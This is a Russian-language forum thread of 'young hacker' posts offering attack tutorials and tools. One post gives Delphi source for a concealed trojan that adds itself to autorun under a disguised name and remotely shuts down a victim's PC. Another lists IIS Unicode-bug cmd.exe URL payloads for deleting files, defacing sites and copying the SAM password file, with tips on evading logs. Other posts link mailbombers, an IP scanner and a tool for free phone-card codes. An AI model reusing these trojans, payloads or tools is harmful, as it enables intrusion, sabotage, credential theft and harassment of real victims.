JavaPhone

Объявление

Форум открыт был недавно и ждет новых пользователей!!! Заходи на форум общайся,создавай темы,выкладывай игры. Не забывайте заглядывать в объявления на форуме.Рекомендуется просматриваит форум через Internet Explorer. Объявляется новый конкурс Самый красивый аватар форума


Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » JavaPhone » Все для компьютера. » Уголок юного хакера>>


Уголок юного хакера>>

Сообщений 1 страница 7 из 7

1

Всё для хакера

0

2

Создаём своего трояна

Ты уже сто раз слышал это магическое слово 'Троян'. В твоих извилинах, наверно уже давно крутиться мысль о создании собственного боевого коня.
Сегодня тебе предстоит эта уникальная возможность. Даже если ты никогда не будешь использовать эти знания, тебе всё равно нужно знать, как работают трояны изнутри.
Для простоты тела мы сделаем это на Delphi.
Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер).

Троянский сервер:
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект ("File" - "New Application"). Сейчас мы примемся за серверную часть трояна.

Для начала выбери пункт меню "Options" из меню "Project". Перед тобой будет окно.

Здесь ты должен перенести "Form1" из раздела "Auto-Create forms" (список слева) в "Available forms" (список справа), как это сделано у меня. Только что мы отключили Form1 из списка авто инициализируемых форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень просто.

На странице "Application" этого же диалога есть кнопка "Load Icon". Нажми её, чтобы сменить иконку будущей проги. Если икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё смертельное оружие.

Теперь ты должен бросить на форму компонент ServerSocket из раздела "Internet", это сервак протокола (по умолчанию TCP, и нам его достаточно). Выдели созданный ServerSocket1 и перейди в ObjectInspector. Здесь тебя интересует только свойство "Port". По умолчанию оно равно 1024, но я тебе советую его поменять на любое другое (желательно больше 1000).

Теперь щёлкни в любом месте на форме, чтобы активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке Events. Дважды щёлкни по строке "OnCreate" и Delphi, как всегда, создаст процедуру, она будет выполняться при инициализации формы. Напиши там следующее:

procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
RegIni:=TRegIniFile.Create('Software');
RegIni.RootKey:=HKEY_LOCAL_MACHINE;
RegIni.OpenKey('Software', true);
RegIni.OpenKey('Microsoft', true);
RegIni.OpenKey('Windows', true);
RegIni.OpenKey('CurrentVersion', true);
RegIni.WriteString('RunServices', 'Internat32.exe',
Application.ExeName);
RegIni.Free;
ServerSocket1.Active:=true;
end;

Теперь перейди в начало текста и напиши после "uses" слово "registry". Мы уже делали такую операцию в статье про мега плеер, но я повторю, как это будет выглядеть:

uses registry, Windows, Messages,

Теперь я объясню, что мы написали в процедуре.

"var RegIni:TRegIniFile" - здесь мы объявили переменную RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с реестром.

"RegIni:=TRegIniFile.Create('Software')" - инициализируем переменную указывающую на реестр.

"RegIni.RootKey:=HKEY_LOCAL_MACHINE" говорим, что нас интересует раздел HKEY_CURRENT_USER реестра.

"RegIni.OpenKey('Software', true)" - открываю подраздел "Software".

Дальше я последовательно открываю подразделы, пробираясь в недра окошек.

"RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName)" - записываю в раздел "RunServices" (в этом разделе хранятся проги, которые автоматически загружаются при старте), новый параметр с именем "Internat32.exe" (имя будущего файла) и значением Application.ExeName (здесь храниться полный путь к запущенному трояну).

"RegIni.Free" - уничтожаю ненужный больше объект RegIni.

Всё это делалось, чтобы при запуске проги, она сама себя прописывала в разделе автозапуска. И после перезагрузки компьютера она автоматически загружалась в память.

Самая последняя строка "ServerSocket1.Active:=true" запускает сервер на указанном тобой порте.

С загрузкой покончено. Теперь давай займёмся выгрузкой. Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по строке "OnDistroy". Теперь создастся процедура, которая будет выполняться при уничтожении формы. В созданной процедуре напиши:

procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
ServerSocket1.Active:=false;
end;

Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя жертва может поймать синий экран, если ты в это время будешь подключён к серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать себя раньше времени. Тем более, что после синего экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и скажу, что мы сами будем перегружать компьютер жертвы).

Теперь нужно выделить ServerSocket1 и перейти на закладку Events у ObjectInspector-а. Дважды щёлкни по строке "OnClientRead" и в созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт) напиши:

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
Socket: TCustomWinSocket);
begin
if Socket.ReceiveText ='R' then
ExitWindowsEx(EWX_SHUTDOWN,0);
end;

Теперь, как это звучит по-нашему:

Если полученный текст = букве 'R' то
Отправить компьютер в редаун.

ExitWindowsEx - редаун заставит окна свернуться и отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным приложениям полетит запрос о выключении, и жертва сможет сохранить свои изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью света, так что жертва не успеет от страха воздух испортить :).

Троян практически готов, сохрани его. Для этого выбери "Save All" из меню "File". С начала Delphi запросит имя формы. Оставь по умолчанию (Unit1) и нажми "Сохранить". Потом будет запрос на имя проекта, которое будет использоваться в качестве имени ЕХЕ файла. Назови его "Internat32", чтобы файл не вызывал особых подозрений.

Конюшня для коня:
Теперь ты должен хорошенечко спрятать своего будущего скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню "Project Manager" из меню "View". Перед тобой откроется окно.

Щёлкни правой кнопкой по Internat32.exe и в появившемся меню выбери "View Source". Перед тобой откроется маленький файл с исходным текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не хватает, а что лишнее - убери (так не так уж и много):

program Internat32;

uses
Forms,
Windows.
Unit1 in 'Unit1.pas' {Form1};

{$R *.RES}

var
WhEvent:THandle;
begin
Application.Initialize;
ShowWindow(Application.Handle,SW_Hide);
Form1:=TForm1.Create(nil);
Application.Run;

WhEvent:=CreateEvent(nil, true,false, 'et');
while (true) do
begin
WaitForSingleObject(WhEvent,1000);
Application.ProcessMessages;
end;
end.

Будь внимателен при переписывании. Всё должно быть один к одному. Теперь я расскажу, что здесь написано:

В самом начале нет ничего интересного, и нас абсолютно не касается. Нас интересует всё, что написано после слова "Var".

WhEvent:THandle - Этим я говорю, что мне нужен указатель WhEvent на пустое событие Thandle.

Application.Initialize - Инициализируется троян.

ShowWindow(Application.Handle, SW_Hide) - Устанавливаю параметры окна. Параметр SW_Hide - говорит, что окно должно быть невидимо. Единственное, как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас используется не вызывающее подозрения (только у чайника, профи уже давно знают, о таком имени) имя.

Form1:=TForm1.Create(nil) - создаю форму. Мне приходится это делать так, потому что мы убрали форму из из списка авто создаваемых.

Application.Run - запускаю трояна. Здесь запускаются обработчики событий и прочая ерунда, за которую отвечает Delphi и которую пришлось бы писать вручную на С или С++. А здесь всё очень просто.

WhEvent:=CreateEvent(nil, true,false, 'et') - инициализация пустого события.

Следующие пять строчек я напишу словами, а ты разберёшься как всегда методом сравнения:

Пока (true) выполнять
Начать цикл
Ждать пока наступит событие (пустое событие, 1000 миллисекунд)
Получить управление
Закончить цикл

Две строчки между началом и концом цикла будет выполняться бесконечно, потому что true оно всегда true, и из этого цикла выхода нет. Весь цикл заключаеться в двух особенностях:

1. Запускается ожидание несуществующего события. Так как событие не существует, то программа прождёт его ровно указанное время в качестве второго параметра (1000 миллисекунд или 1 секунда).

2. Получить управление.

После второго шага программа снова перейдёт на пункт 1 и запустит ожидание. Во время ожидания пользователь работает с другими приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление, то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение может быть одно - приход на указанный тобой порт управляющей команды. Если сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или нет), после этого пользователь снова работает 1 секунду без проблем. Проверка происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с сотым камнем.

Нажми "Ctrl+F9" чтобы Delphi создал .ехе файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать, что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что после первого же запуска троян пропишется в реестре по адресу: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices. Не забудь после тестирования его удалить.

Теперь переходим к клиентской части, которую ты должен будешь запустить на своём компьютере для управления компьютером жертвы.

Троянский всадник:
Снова сохрани все изменения и создай новый проект. Пришло время писать клиентскую часть трояна. Ещё пару минут напряжённого труда и все красавицы наши :).

На новый проект ты должен бросить три компонента:

1. Button из закладки "Standart" для отправки команды на компьютер жертвы.

2. Edit из закладки "Standart" для ввода имени или адреса жертвы.

3. ClientSocket из закладки "Internet" клиент порта для связи с сервером

Выдели ClientSocket1 и в ObjectInspector-е измени свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты назначил серверу.

Теперь дважды щёлкни по кнопке и в созданной процедуре (обработчике нажатия кнопки) напиши следующее.

procedure TForm1.Button1Click(Sender: TObject);
begin
ClientSocket1.Host:=Edit1.Text;
ClientSocket1.Active:=true;
ClientSocket1.Socket.SendText('R');
ClientSocket1.Active:=false;
end;

ClientSocket1.Host:=Edit1.Text - В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.

ClientSocket1.Active:=true - активировать соединение с сервером.

ClientSocket1.Socket.SendText('R') - отправить букву R. Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он перегрузит машину.

ClientSocket1.Active:=false - закрыть соединение с сервером.

Всё. Троян готов к бою. Нажми "Ctrl+F9" чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится

+1

3

Вот игрушка hackthegame_1.1 (эмуляция работы хакера) сылка http://depositfiles.com/files/2910489

0

4

Вот ip сканер сылка http://depositfiles.com/files/2910538

0

5

А вот программа для холявщиков с mts  тут все карты оплаты сылка http://depositfiles.com/files/2910545

+1

6

Вас обидел враг? А вы знаете его mail? Не хотите ломать его? Тогда отправьте
ему пару томиков "Войны и Мира" или любого спама... Серия mailbombers (майл
бомберов) лежит как раз для вас!

Любая программа найдётся у нас. Сенсация: пишите на tehnofil@tehnofil.ru,
укажите, какая программа Вам нужна и в течении недели она будет найдена
для Вас и Вы сможете её скачать(услуга бесплатна и предоставляется в
рекламных целях)! сылка http://depositfiles.com/files/2910581

+1

7

Взлом сайта

INTRO .

Приветствую тебя, о горе хакер, сколько ты уже страничек навернул (?) , сколько ты уже админов обидил свим дефейсом ? Что, нисколько? Ну ладно, горе юзер, научу я тебя в этой статье тому, как можно взломать страничку, примерно, этак минут за 20. Ломать мы с тобой сегодня будим через всем хорошо известный Unicode Bug , если ты еще не знаешь что это такое, то я тебе поведаю об этом.

Unicode Bug - где это и как?

Ну что ж , UNICODE BUG - это стандартный недавний , давний ( нужное вычеркнуть ) баг в Microsoft' овской IIS на серверах. Почему недавний (?)- спросишь ты, а я отвечу - недавний, так как обноружен был только в четвертой и пятой версиях Microsoft IIS. Как говорится - баг, стандарт де факто :-) одним предложением это можно сказать так: С помощью нескольких команд ты проникаешь на драйв сервера, другой лазаешь по папкам и находишь index.htm или default.htm , ну а третьей проводишь дефейс. Правдо все легко? Да? Ан нет, не все так легко как кажется , ну что же , давай начнем наше темненькое дельце ?

Пингуем сервак и обноруживаем что у них стоит .

Так, вопервых, нам на сервере необходимо обнаружить Microsoft IIS 4 или 5 на сервере, и что бы стояла она на windows 98 NT или 2000 . На NT в основном стоит IIS 4 , впрочем и так тоже нормально. Кстати, с IIS под виндовсы меньше возьни чем допустим , с Аппчей, или еще каким нибуть другим типом сервера. Так вот, я отвлекся... что бы обноружить то, что стоит на серваке, необходимо зайти на netcraft.com/ , потом ткнуть на ссылку What's that site running? , и слева будет одно поле, туда вводим урл на необходимый сайт и жмем Examine , потом ищи надпись The site сервак.ru is running Microsoft-IIS/5.0 on Windows 2000 или должно быть - The site сервак.ru is running Microsoft-IIS/4.0 on NT4/Windows 98 .Если нашел, то знай, ты почти у них на диске. Ну а если что то другое будет то ты не тот сайт за IIS сервак пингуешь. Ой , прошу прощения у любителей сканов типа SuperScan что не указал что пинговать на IIS надо сканером , а указал путь как проверить с вэба. Но можно и сканером, но я пожалуй не буду тебя утруждать, и нагружать про эти длинные истории... может
быть как нибуть в другой раз, в другой статье.

Проверяем сервак с IIS 4,5 на Unicode Bug .

Ну а теперь братец хацкер, если ты нашел хоть один такой сервер, то ты наверно уже очень хочешь пройтись по диску сервера, ведь правда? Ан нетушки, сервер может быть уже и пропатчен, так вот , давай проверим сервер на дырявость. Для этого необходимо добавить к урлу ломаемого тобой сайта строчки приведенные чуть ниже. И если после добавления очередной строчки
ты увидишь диск С:/ серванта, то знай, ты на верном пути.

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/
winnt/system32/cmd.exe?/c%20dir+c:\

И если при добавлении очередной строчки у тебя открылося диск С:/ сервера, то знай, ты почти хакер :-)

Находим InetPub и DEFAULT"овую страницу.

Так вот, ты на диске серванта, теперь на данный момент главное для тебя - найти InetPub/wwwroot/А дальше - что админ пошлет :-) Так вот, тебе надо лазить по папкам, но ты незнаешь как, подскажу , видишь диск С:/ , допустим есть там папка InetPub , да, есть, и допустим ты сейчас тут : сервер.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ так вот , мы берем и меняем строку так: сервер.ru/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\InetPub , кликаешь Enter , и видим содержание папки InetPub. Я думаю что все легко и просто . Так, смотрим, видим что есть папка samples , adminscripts, ftproot , wwwroot, опаньки , попалась :-) щас мы туда и пойдем . А если же нету вообще нечего подобного на диске С:/ , значит - НЕТУ, иди на другой диск сервера и ищи это все там , делается это так , вот у тебя конец
строки : /c+dir+c:\ , меняй его на /c+dir+d:\ - то есть мы теперь переходим на диск D:/ и все по новой - ищи InetPub/wwwroot , так как именно в этой папке и хранится index.htm или default.htm. И все остальных страницы сайта. Но нам все остальные, думаю непонадовятся. Хотя, кто его знает :-) Вдруг ты собрался полностью почистить сервак :-) Так вот, допустим ты нашел , ага, как вижу - нашел :-) Давай займемся собственно говоря, тем, зачем пришли, хаком и дефейсом :-) Погоди еще, стой, я тебе еще не рассказал об одной команде которая тебе может понадобится, это - del . Так вот, что бы ее приминить - меняем конец нашей строки на вот такой /c+del+d:\inetpub\wwwroot\page.htm вот , это командой мы удаляем файл page.htm , и помни - путь и файл можешь писать свой :-)

Взлом сайта

DEFACE.

Ты уже нашел страничку, и уже готов к дефейсу, наверно же уже и текст придумал :-) ты говоришь - а почему текст?! Да потому что дефейс - плаин текстовый, ломаем мы ведь - не по ФТП, а уникод багом. Ну вот, ты огорчился что не повесишь картинку накануне нарисованную тобой? Не огорчайся, чуть дальше я тебе расскажу как можно получить полный доступ, или даже повесить
картинку. СТОП, я отвлекся, давайте начнем дефейсить?! Типа нужно добавить к урлу сервера вот эту строку : /scripts/ww.exe?/c+echo Hacked by Hacker>>с:/inetpub/wwwroot/default.htm Так, давай рассмотрим эту строку.
Мы видим - слова Hacked by Hacker - они то и будут висеть на главной странице ломаемого сайта, но, внизу странички :-( А это нам неподходит, мы хотим что бы черным по белому было написанно что ВЗЛОМАННО :-) То, меняем строку на вот эту : /scripts/ww.exe?/c+echo Hacked by Hacker>с:/inetpub/wwwroot/default.htm
Называется найди одно отличее :-) т.е. у нас теперь наш текст не добавляется, а создает новую страничку, всмысле - не зодает, а в нашем случае - очищает и пишет наш дефейс текст :-) Ну вот ты и герой :-) но не последний :-) думаю эту страничку после твоего взлома задефейсят еще миллион раз :-)

Имеем полный доступ.

Давайте рассмотрим способ как можно поиметь полный доступ к сайту. Мы знаем что на сервере где то есть файл, с именем sam._ вообще написанно будет если увидишь , просто sam , так вот, в нем лежит пароль от сайта. Его то мы и будим мучать сейчас, давайте его перенесем в инетпаб/wwwroot и сольем с
сайта /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+d:\winnt\repair\sam d:\inetpub\wwwroot
Рассмотрим команду: /c+copy+d:\winnt\repair\sam - это мы копируем файл . И надо знать, что папка WINNT может находится на
любом диске , как на c:/ так и на D:/, так что это тебе надо учесть. Ну вот , и если у тебя будет написанно Ошибка в приложении CGI бла бла не возращены заголовки бла бла, а в низу написанно Отказано в доступе. Скопировано файлов: 0. или что то вроде Acces denied Files copy : 0 , это если ты сервак американский ломаешь, то знай - доступ к записи и перезаписи этого файла - закрыт. Значит не судьба тебе получить полный доступ к сайту. Ну а если написанно Скопировано файлов: 1 - то тебе повезло :-) Иди на сайт и сливай файл. Если будет написанн только заголовок при команле type вместо dir , в моих
случаях это было что то вроде MSCD . То тебе нада как то по другом скачать файл, как - я незнаю. потом возьми прогу l0Pht crack , или как там она называется, и декодируй sam._ Может что и выйдет, хотя, врядли, так как может занять примерно около 5 дней декодирование. Вообще, правда, зачем нам нужно это декодировние, если можно дефейсить и картинкой :-) и
прописывая титл :-) Что еще от жизни надо? так вот, добавляем к урлу сервера эту строку:/scripts/ww.exe?/c+echo+"<html><title>Привет</title>
<STYLE>+BODY+{+background-image:+url(xpaxo.net/xpaxologo.jpg);+}

</style></html>">d:/inetpub/wwwroot/Default.htm
Вот, выше представленна ОДНА строка, т.е. написанно двумя, но ты их совмести в одну строчку! Ну вот, тепеь на паге красуется дефейс, с титлом , и с бэкграундом. Вот такие вот дела :-)

LOGS и как с ними бототься.

Давайте поближе подойдем к логам. В логи пишется ВСЕ! Все что было сделанно на сервере, хранятся логи тут winnt\system32\logfiles\ и дальше выбираешь в какую папку пойти , чаще всего это папки с именами типа W3SVC1. Вот в нее
и заходи. Перед тобой появится большой лист с файлами , имена у них in020113.log опять же рассмотрим имена файлов, написанно in , потом идет год, затем месяц, затем дата, короче- inГод/Мес/Дата.log , сделать им type вместо dir не пытайся,
если файл большой, или маленький, да все равно какой, он тебе не покажется. Что бы его просмотреть нужно скопировать в inetpub/wwwroot , сделать это можно вот это командой: /c+copy+d:\winnt\system32\logfiles\W3SVC1\inГод/Мес/Дат.log%20
d:\inetpub\wwwroot Вот, и где W3SVC1\inГод/Мес/Дат.log - это последующий путь к логу который тебе необходим. и d:\inetpub\wwwroot - тоже вполне может быть не на диске d:\ а на c:\ , думаю ты уже понял что копировать нам надо в ту папку где находится и дефолтовая страничка. Так вот, если скопировалось удачно то будет написанно Ошибка CGI Указанное приложение CGI не возвратило бла бла бла Скопировано файлов: 1. Все ОК, теперь лезем на ломаемый сайт где уже висит наш дефейс и добавляем имя файла который мы скопировали. Смотрим, вау! Большой файл, сохраняем себе на драйв его, дисконектаемся, открываем лог, читаем, ого ! Да там же есть ВСЕ :-) К примеру рассмотрим эту строчку : 62.213.9.21, -, 13.01.2002, 0:07:51, W3SVC1, INET, 192.168.100.4, 1372, 305, 331, 200, 0, GET, /Default.htm, -, это тут вот что есть : IP , вполне может быть и из под прокси . Потом дата. Потом время, сразу оговорюсь - время которое на сервере а не у вас, затем следует какие то папки и функции, потом наверно IP с которого запрашивался данный файл. затем непонятного значения цифры, потом GET - это то , что делали с файлом, еще бывает POST, HEAD, что они точно обозначают я незнаю. А потом еще и дается файл который был открыт, всмысле - не открыт, а увиден. Ну ладно, теперь скажу зачем нужно читать логи. В логах можно вычитать очень много чего полезного. Можно вычитать IP админа, и прочих юзверей, можно вести маленькую статистику показыавая в гвесте сайта где большая посещаемость :-) админ будет ошарашен , хотя нет, это все нам непонадобится. Или если ты вычитал сайт из архива взломанных серверов, типа как на void.ru , то ты наверняка знаешь что где то там стоит дата взлома. Мы смотрим дату, лезем в раздел с логами на ломаемом сервере , ищим лог с датой взлома, как они именуются я описал выше. Копируй лог сам знаешь куда (описанно выше) и сливай, разглядывай и ищи способ взлома страницы, кстати, если нечего не нашел насчет взлома (это там должна быть команда типа echo) значит это стоит дата зеркалирования. А взлом может быть вполне двумя или одним днем раньше. Опять же лезем, ищим, находим, копируем, сохраняем, смотрим, опять же находим :-) И теперь уже со спокойной душой дефейсим :-) Все, дело сделанно , идем пить...э...типа что кому нравится...
Теперь рассмотрим способ сокрытия IP, ищим анонимный закрытый прокси и используем его, как использовать прокси , думаю ты знаешь, не маленький уже. И все, теперь твой IP подменяется при записи в логи. Но если админчики хакнутого тобой сайта очень захотят тебя вычислить и впоймать, то онивычислят проксика, обратятся к ним , скажут дату , время , и IP (подмененный) , а они выдадут тебя, это точно :-) Но что бы обратится, им надо будет идти туда, где главный компьютер, или как бы еще сказать, у прокси, а этот компьютер может быть очень и очень далеко :-) В другой стране допустим. Короче они тебя впоймают! Это
гарантированно :-) Типа дома устроют "Маски-Шоу".

Извлекаем полезное из вzлома.

Хо хо, ты еще незнаешь что можно извлечь полезного из взлома?! А я тебе расскажу, хотя это уже и другая статья. НО, ты можешь вот что извлеч: 1. Маленькую, но популярность, сообщив о взломе в некоторые места :-) Типа void.ru или xakep.ru , за рекламу прошу прощенья :-) 2 . Личное самоудоволетворение. Типа ты взломал, и ты за себя даволен. 3 . можно найти на сайте пароли, от чего угодно, как от ВМ, это web money , так и до кодов и лецензионных программ, может админ на сайте хранит коллекцию более 3000 mp3 , но не дает об этом знать :-) ?! Так сообщи народу где эта коллекция лежи :-)

0


Вы здесь » JavaPhone » Все для компьютера. » Уголок юного хакера>>